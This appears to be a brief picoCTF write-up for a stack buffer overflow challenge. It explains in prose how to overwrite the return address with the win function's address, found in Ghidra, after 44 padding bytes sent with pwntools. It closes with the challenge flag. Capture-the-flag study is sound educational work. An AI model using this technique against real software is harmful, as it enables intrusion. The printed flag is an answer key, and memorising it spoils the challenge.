Sanjay C / Palash Oswal
Control the return address Now we're cooking! You can overflow the buffer and return to the flag function in the program. You can view source here. And connect with it using nc saturn.picoctf.net 63077
- Make sure you consider big Endian vs small Endian.
- Changing the address of the return pointer can call different functions.
Read vuln.c and notice the win function gives the flag.
Opening vuln with Ghidra, navigating to functions, then searching for the win function is the way to get the return address to the win function.
Run script.py to solve the challenge. pwntools is a Python library that's really useful for solving pwn (binary exploitation). The code connects to the shell, then writes 44 "a"s and sends the address of the win function.
I don't know where 44 came from, that was obtained through trial and error
picoCTF{addr3ss3s_ar3_3asy_60fac6aa}